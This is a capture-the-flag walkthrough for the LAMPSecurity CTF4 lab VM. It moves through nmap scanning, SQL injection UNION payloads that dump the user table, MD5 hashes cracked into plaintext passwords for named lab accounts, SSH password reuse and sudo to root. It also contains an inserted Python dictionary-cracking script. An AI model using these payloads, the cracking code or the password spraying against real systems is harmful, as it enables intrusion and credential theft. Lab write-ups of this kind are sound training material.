- VM: LAMPSecurity: CTF4
- Goal: Gain root access
- Approach: solve without automated exploitation tools
nmap -sn 192.168.172.200-254
nmap -p- -A 192.168.172.237
- Port 22: OpenSSH 4.3
- Port 80: Apache httpd 2.2.0
Also found 5 hidden folders on port 80: /mail/, /restricted/, /conf/, /sql/ and /admin/. Looks like the web server should be checked out first.
First, poke around the website for a bit.
Let's check the hidden folders. /conf returned an error. /restricted, /mail and /admin all require a login. But the table schema was sitting in the hidden folder /sql:
This is great info: table user stores user_name and user_pass.
After checking out some more, the blog page appears to be vulnerable to SQL injection when a single quote (') is appended to the id value:
Knowing from the schema that blog_id is the id column, I then confirmed the injection with the following id value, which successfully returned a record selected by my own SQL condition (blog_id 1000 does not exist, so the post that comes back is number 2):
id=1000+or+blog_id%3d2-- (1000 or blog_id=2--)
Time to retrieve the contents of table user. Based on the table schema, the blog table has 4 fields. Let's check which fields are used for display:
id=1000+union+select+1,2,3,4-- (1000 union select 1,2,3,4--)
Oops, an error. Looks like the number of columns is not 4. Now I need to find out how many columns the page's query actually returns, by running a few tests with an ORDER BY clause:
id=1000+order+by+4-- (1000 order by 4--)
id=1000+order+by+5-- (1000 order by 5--)
id=1000+order+by+6-- (1000 order by 6--)
ORDER BY 4 and ORDER BY 5 worked fine; ORDER BY 6 returned an error. That means the query behind the page returns 5 columns, not the 4 the schema lists for blog. Back to checking which fields are displayed:
id=1000+union+select+1,2,3,4,5-- (1000 union select 1,2,3,4,5--)
Great, fields 2, 3, 4 and 5 are displayed. Now it's time to retrieve the user table's contents:
id=1000+union+select+1,user_pass,3,4,user_name+from+user-- (1000 union select 1,user_pass,3,4,user_name from user--)
Nice, six username and password hash pairs obtained. The hashes are 32 hex characters, so very likely MD5. They were then cracked successfully by looking them up on md5decrypt.net:
dstevens: ilike2surf
achen: seventysixers
pmoore: Homesite
jdurbin: Sue1978
sorzek: pacman
ghighland: undone1
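An offline equivalent of that lookup, added here as an example and not part of the write-up: identify the digest family from the hash length, then run a dictionary attack with hashlib instead of handing the hashes to a third-party site. The wordlist is constructed for the demo (a few of the recovered passwords mixed with decoys); the target hashes are computed from known words so no real hash values are copied in.

```python
import hashlib
import re

# Added example (not from the write-up). WORDLIST is constructed for the demo.

LENGTH_CANDIDATES = {32: ["MD5", "NTLM"], 40: ["SHA-1"], 64: ["SHA-256"]}


def md5hex(s):
    return hashlib.md5(s.encode()).hexdigest()


def identify_hash(h):
    """Guess unsalted digest families from length: 32 hex chars -> MD5 or NTLM."""
    if not re.fullmatch(r"[0-9a-fA-F]+", h):
        return []
    return LENGTH_CANDIDATES.get(len(h), [])


def crack_unsalted(hashes, wordlist, algo="md5"):
    """Dictionary attack on unsalted hashes: digest every candidate once,
    then look each target up. Unsalted storage is what makes a precomputed
    table (or a public lookup site) work at all."""
    table = {}
    for word in wordlist:
        digest = hashlib.new(algo, word.encode()).hexdigest()
        table.setdefault(digest, word)
    return {h: table.get(h.lower()) for h in hashes}


WORDLIST = ["password", "pacman", "letmein", "ilike2surf", "qwerty", "Sue1978"]


def demo():
    # Constructed targets: two words in the list, one not.
    targets = [md5hex(w) for w in ("pacman", "Sue1978", "not-in-the-list")]
    for h in targets:
        print(h, identify_hash(h))
    return crack_unsalted(targets, WORDLIST)


if __name__ == "__main__":
    for h, word in demo().items():
        print(h, "->", word if word else "(not cracked)")
```

An uncracked hash maps to None rather than being dropped, so the caller can tell a miss from a success; that distinction matters when the next step is spraying the recovered passwords at SSH.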
With these passwords in hand, I tried them on SSH. We are lucky: the passwords stored in the database are the same passwords used to log in to the system.
Time to enumerate the system for a way to get root privileges. First, find out more about the user with the id command:
The user 'dstevens' is a member of the group admins. Next I checked his sudo rights, and sure enough he can run sudo su, which grants a root shell:
sudo -l
sudo su
root shell achieved!